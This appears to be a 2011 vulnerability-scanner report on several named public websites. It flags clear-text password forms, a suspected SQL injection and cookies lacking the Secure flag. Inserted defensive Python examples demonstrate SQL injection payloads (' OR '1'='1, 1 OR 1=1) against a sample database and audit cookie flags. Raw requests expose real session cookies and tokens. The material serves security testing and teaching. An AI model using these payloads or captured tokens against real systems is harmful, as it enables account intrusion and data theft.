HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:17:34 GMT Server: Omniture DC/2.0.0 xserver: www334 Content-Length: 263 Keep-Alive: timeout=15 Connection: close Content-Type: text/html
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
GET / HTTP/1.1 Host: advertise.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 22:03:27 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Set-Cookie: PHPSESSID=6299093c20d21df56a507e2d4f08aada; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 6299093c20d21df56a507e2d4f08aada=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 84850
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Free Software and Sh ...[SNIP]... <div id="signin" style="visibility: hidden;"> <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);"> <div class='bgBlue'> ...[SNIP]... <br /> <input type="password" name="pw" size="20" maxlength="20" value="" /> </p> ...[SNIP]...
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://boardreader.com/my/subscription.html
The form contains the following password field:
pass
Request
GET /my.html HTTP/1.1 Host: boardreader.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; __utma=69622787.1197951510.1296677341.1296677341.1296762768.2; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 20:31:23 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close
GET /showthread.php?t\\x3d1355583\\x22 HTTP/1.1 Host: forums.digitalpoint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.butterscotch.com/?src=tcv3video
The form contains the following password field:
password
Request
GET /?src=tcv3video HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.butterscotch.com/signup.html
The form contains the following password fields:
password
password2
Request
GET /?src=tcv3video HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.butterscotch.com/tutorials.html
The form contains the following password field:
password
Request
GET /tutorials.html HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.butterscotch.com/signup.html
The form contains the following password fields:
password
password2
Request
GET /tutorials.html HTTP/1.1 Host: www.butterscotch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.ericmmartin.com/wordpress/wp-login.php
The form contains the following password field:
pwd
Request
GET /projects/simplemodal/ HTTP/1.1 Host: www.ericmmartin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:49:00 GMT Server: Apache X-Powered-By: PHP/5.3.3 Expires: Thu, 19 Nov 1981 08:52:00 GMT X-Pingback: http://www.ericmmartin.com/wordpress/xmlrpc.php Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Thu, 03 Feb 2011 20:01:19 GMT Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 34911
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.facebook.com/
The form contains the following password field:
reg_passwd__
Request
GET / HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=Al9E9; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 21:49:20 GMT Content-Length: 30803
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://membercenter.made-in-china.com/logon.do
The form contains the following password field:
logonInfo.logPassword
Request
GET / HTTP/1.1 Host: www.made-in-china.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.sfweekly.com/readers/login/
The form contains the following password field:
data[Reader][password]
Request
GET /2010-08-11/news/ihelp-for-autism/ HTTP/1.1 Host: www.sfweekly.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.supertradeexchange.com/acct/login.asp
The form contains the following password field:
pwd
Request
GET / HTTP/1.1 Host: www.supertradeexchange.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 13237 Content-Type: text/html Server: Microsoft-IIS/7.0 Set-Cookie: itex%5Fpersist=anon=Y; expires=Fri, 03-Feb-2012 08:00:00 GMT; domain=www.supertradeexchange.com; path=/ Date: Thu, 03 Feb 2011 19:35:26 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>SuperTradeExchange® - a small business community and barter netwo ...[SNIP]... </h3> <form name="SignIn" action="/acct/login.asp" method="post" onkeyup="eval_button(event, this)"> <label for="login"> ...[SNIP]... </label> <input type="password" name="pwd" id="pwd"><br> ...[SNIP]...
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.thefutoncritic.com/myfuton.aspx
The form contains the following password field:
password
Request
GET /devwatch/wright-vs-wrong/x22 HTTP/1.1 Host: www.thefutoncritic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Set-Cookie: ASP.NET_SessionId=kzhsyk55h14dmof1ovtfne55; path=/; HttpOnly X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 20:29:43 GMT Connection: close Content-Length: 20828
<html> <head> <title>Shows A-Z - wright vs wrong on abc | TheFutonCritic.com</title> <meta id="Meta_Description" name="Description" content="wright vs wrong on abc ... TheFutonCritic.com has wright ...[SNIP]... <td>
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.thumbshots.com/Firefox.aspx
The form contains the following password field:
dnn$ctr753$Login$Login_DNN$txtPassword
Request
GET /Firefox.aspx HTTP/1.1 Host: www.thumbshots.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: language=en-US; .THUMBSHOTSCOMASPXANONYMOUS=3usfLnL6ywEkAAAAYzEyMGFiNzgtNzI2ZS00ZjEwLWJmM2EtOWEzOGJlOGE0Y2Y30;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 44740 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: language=en-US; path=/; HttpOnly X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 20:30:21 GMT Connection: close
GET /preview/194850/x22 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The request appears to contain SQL syntax. If this is incorporated into a SQL query and executed by the server, then the application is almost certainly vulnerable to SQL injection.
You should verify whether the request contains a genuine SQL query and whether this is being executed by the server.
Issue remediation
The application should not incorporate any user-controllable data directly into SQL queries. Parameterised queries (also known as prepared statements) should be used to safely insert data into predefined queries. In no circumstances should users be able to control or modify the structure of the SQL query itself.
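Added example, not part of the scan report or of any scanned application: the same user lookup written three ways in Python with the standard-library sqlite3 module (the table, rows and login payloads are constructed for this example). The concatenated query returns every user for a classic quote-breaking payload; doubling quotes stops that payload in a quoted string context but does nothing in a numeric context; the parameterised versions bind the same inputs as plain data and match nothing.

```python
import sqlite3

# Constructed sample database for this added example; it is not data from any scanned site.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw TEXT)")
    conn.executemany("INSERT INTO users (name, pw) VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2"), ("carol", "pa55")])
    conn.commit()
    return conn

def login_vulnerable(conn, name, pw):
    # Input is spliced into the query text, so it can change the query structure.
    sql = "SELECT name FROM users WHERE name = '%s' AND pw = '%s' ORDER BY id" % (name, pw)
    return [row[0] for row in conn.execute(sql)]

def _double_quotes(value):
    return str(value).replace("'", "''")

def login_quote_doubling(conn, name, pw):
    # Doubling quotes defeats the string-context payload, but only in a quoted context.
    sql = "SELECT name FROM users WHERE name = '%s' AND pw = '%s' ORDER BY id" % (
        _double_quotes(name), _double_quotes(pw))
    return [row[0] for row in conn.execute(sql)]

def user_by_id_quote_doubling(conn, user_id):
    # Numeric context: no quote is needed to break out, so quote doubling changes nothing.
    sql = "SELECT name FROM users WHERE id = %s ORDER BY id" % _double_quotes(user_id)
    return [row[0] for row in conn.execute(sql)]

def login_parameterised(conn, name, pw):
    # Query structure is fixed first; values are bound afterwards and can only ever be data.
    sql = "SELECT name FROM users WHERE name = ? AND pw = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (name, pw))]

def user_by_id_parameterised(conn, user_id):
    # The bound value is compared as data against the INTEGER column; "1 OR 1=1" matches no row.
    sql = "SELECT name FROM users WHERE id = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (user_id,))]

if __name__ == "__main__":
    db = make_db()
    payload = "' OR '1'='1"
    print("vulnerable:", login_vulnerable(db, payload, payload))                      # every user
    print("quote doubling, string context:", login_quote_doubling(db, payload, payload))  # []
    print("quote doubling, numeric context:", user_by_id_quote_doubling(db, "1 OR 1=1"))  # every user
    print("parameterised:", login_parameterised(db, payload, payload))                # []
    print("parameterised, numeric:", user_by_id_parameterised(db, "1 OR 1=1"))        # []
```

The numeric case is the one that escaping-based defences most often miss: `id = 1 OR 1=1` needs no quote at all. With a bound parameter the database compares the text `1 OR 1=1` against the integer column as a value, so the only way to select a row is to supply a real id.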
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
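Added example, not part of the report: a small audit over a raw response header block that parses each Set-Cookie header, records whether Secure and HttpOnly are present, and applies a name heuristic for session-like cookies (the heuristic is an assumption of this example, as is the SameSite attribute emitted by the builder, which post-dates this report). The sample headers are constructed for this example in the shape of the responses shown on this page.

```python
import re

# Cookie names that usually carry a session or authentication token (heuristic; an assumption).
SESSION_NAME_RE = re.compile(r"sess|sid|token|auth", re.I)

def parse_set_cookie(header_value):
    """Split one Set-Cookie value into (name, value, {attribute_lowercase: value})."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")   # first '=' only: values may contain '='
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs

def audit_cookies(raw_response_headers):
    """Return one finding per Set-Cookie header in a raw HTTP response header block."""
    findings = []
    for line in raw_response_headers.splitlines():
        if not line.lower().startswith("set-cookie:"):
            continue
        name, value, attrs = parse_set_cookie(line.split(":", 1)[1])
        findings.append({
            "name": name,
            "secure": "secure" in attrs,
            "httponly": "httponly" in attrs,
            "session_like": bool(SESSION_NAME_RE.search(name)),
        })
    return findings

def cookies_missing_secure(raw_response_headers, session_only=False):
    """Names of cookies issued without Secure; optionally only the session-like ones."""
    return [f["name"] for f in audit_cookies(raw_response_headers)
            if not f["secure"] and (f["session_like"] or not session_only)]

def build_set_cookie(name, value, path="/", secure=True, httponly=True, samesite="Lax"):
    """Assemble a Set-Cookie value with the protective attributes switched on by default."""
    parts = ["%s=%s" % (name, value), "Path=%s" % path]
    if secure:
        parts.append("Secure")
    if httponly:
        parts.append("HttpOnly")
    if samesite:
        parts.append("SameSite=%s" % samesite)
    return "; ".join(parts)

# Constructed response headers for this example, shaped like the ones in the report.
SAMPLE_HEADERS = """HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=aP-3JlTQvoC6; path=/
Set-Cookie: bc-visitor-id=3760177095415339810=7851714395809697412; domain=.boldchat.com; path=/; expires=Fri, 03-Feb-2012 20:32:21 GMT
Set-Cookie: language=en-US; path=/; HttpOnly
Set-Cookie: authtoken=c0ffee; path=/; Secure; HttpOnly
Content-Type: text/html; charset=utf-8
"""

if __name__ == "__main__":
    for finding in audit_cookies(SAMPLE_HEADERS):
        print(finding)
    print("session cookies without Secure:", cookies_missing_secure(SAMPLE_HEADERS, session_only=True))
    print(build_set_cookie("JSESSIONID", "aP-3JlTQvoC6"))
```

The name heuristic is only a triage aid, as the report's own "review the contents of the cookie" wording implies: an opaque cookie such as the `ccl` value in the store.apple.com requests above can carry state worth protecting without a telling name.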
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /aid/3760177095415339810/bc.chat HTTP/1.1 Host: livechat.boldchat.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Resin/2.1.17 Cache-Control: no-cache,no-store Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM", policyref="http://my.boldchat.com/w3c/p3p.xml" Set-Cookie: bc-visitor-id=3760177095415339810=7851714395809697412; domain=.boldchat.com; path=/; expires=Fri, 03-Feb-2012 20:32:21 GMT Set-Cookie: bc-visit-id=3760177095415339810=9223372036839688863; domain=.boldchat.com; path=/ Set-Cookie: JSESSIONID=aP-3JlTQvoC6; path=/ Content-Type: text/html; charset=utf-8 Date: Thu, 03 Feb 2011 20:32:21 GMT Content-Length: 101191
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cgi-bin/WebObjects/MyAppleId.woa?localang=en_US HTTP/1.1 Host: appleid.apple.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /1-800-MY-APPLE/WebObjects/AppleStore.woa/wa/RSLID HTTP/1.1 Host: store.apple.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dfa_cookie=appleglobal%2Capplehome; s_pathLength=homepage%3D1%2C; geo=US; s_sq=%5B%5BB%5D%5D; s_ppv=100%2C100%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3B; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=apple%20-%20index%20(US);
Redirecting to <a HREF="http://store.apple.com/1-800-MY-APPLE/WebObjects/AppleStore.woa/920044001/wo/csKICi1o0fYy23BuHZ269hYUg3j/0.">http://store.apple.com/1-800-MY-APPLE/WebObjects/Ap ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Apple/WebObjects/OrderStatus.woa HTTP/1.1 Host: store.apple.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=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; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /us/sentryx/sign_in?_a=login.guestSign&c=f63ef1babc027e38d46ff1531c1e3f73&_fid=si&r=SXYD4UDAPXU7P7KXF&s=ba6fdbd16f511f7872ee65ac03f444f3&t=SXYD4UDAPXU7P7KXF HTTP/1.1 Host: store.apple.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=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; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.smartdevil.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=269707379.1296764098.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=smartdevil; DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; __utma=269707379.750157364.1296764098.1296764098.1296764098.1; language=en-US; .WWWSMARTDEVILCOMASPXANONYMOUS=89GhtnD6ywEkAAAAMWFiZTZjM2UtM2Y3Yy00MmQ4LTgxNzctZWIwZTAxMjAyYjA10; __utmc=269707379; __utmb=269707379.1.10.1296764098;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21218 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; expires=Thu, 03-Feb-2011 20:48:36 GMT; path=/; HttpOnly Set-Cookie: language=en-US; path=/; HttpOnly X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 20:28:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Home.aspx HTTP/1.1 Host: www.smartdevil.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=269707379.1296764098.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=smartdevil; DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; __utma=269707379.750157364.1296764098.1296764098.1296764098.1; language=en-US; .WWWSMARTDEVILCOMASPXANONYMOUS=89GhtnD6ywEkAAAAMWFiZTZjM2UtM2Y3Yy00MmQ4LTgxNzctZWIwZTAxMjAyYjA10; __utmc=269707379; __utmb=269707379.1.10.1296764098;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21215 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; expires=Thu, 03-Feb-2011 20:48:39 GMT; path=/; HttpOnly Set-Cookie: language=en-US; path=/; HttpOnly X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 20:28:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /SSLLogin.aspx HTTP/1.1 Host: www.smartdevil.com Connection: keep-alive Referer: https://www.smartdevil.com/SSLLogin/tabid/116/Default.aspx?returnurl=%2fdefault.aspx Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: .WWWSMARTDEVILCOMASPXANONYMOUS=89GhtnD6ywEkAAAAMWFiZTZjM2UtM2Y3Yy00MmQ4LTgxNzctZWIwZTAxMjAyYjA10; __utmz=269707379.1296764098.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=smartdevil; __utma=269707379.750157364.1296764098.1296764098.1296764098.1; __utmc=269707379; __utmb=269707379.1.10.1296764098; DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; language=en-US
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /privacy.aspx HTTP/1.1 Host: www.smartdevil.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=269707379.1296764098.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=smartdevil; DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; __utma=269707379.750157364.1296764098.1296764098.1296764098.1; language=en-US; .WWWSMARTDEVILCOMASPXANONYMOUS=89GhtnD6ywEkAAAAMWFiZTZjM2UtM2Y3Yy00MmQ4LTgxNzctZWIwZTAxMjAyYjA10; __utmc=269707379; __utmb=269707379.1.10.1296764098;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 32544 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: DotNetNukeAnonymous=39f9dce9-3fd0-45c5-a324-e4eb772c5e4d; expires=Thu, 03-Feb-2011 20:48:40 GMT; path=/; HttpOnly Set-Cookie: language=en-US; path=/; HttpOnly X-Powered-By: ASP.NET Date: Thu, 03 Feb 2011 20:28:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml"> <h ...[SNIP]...
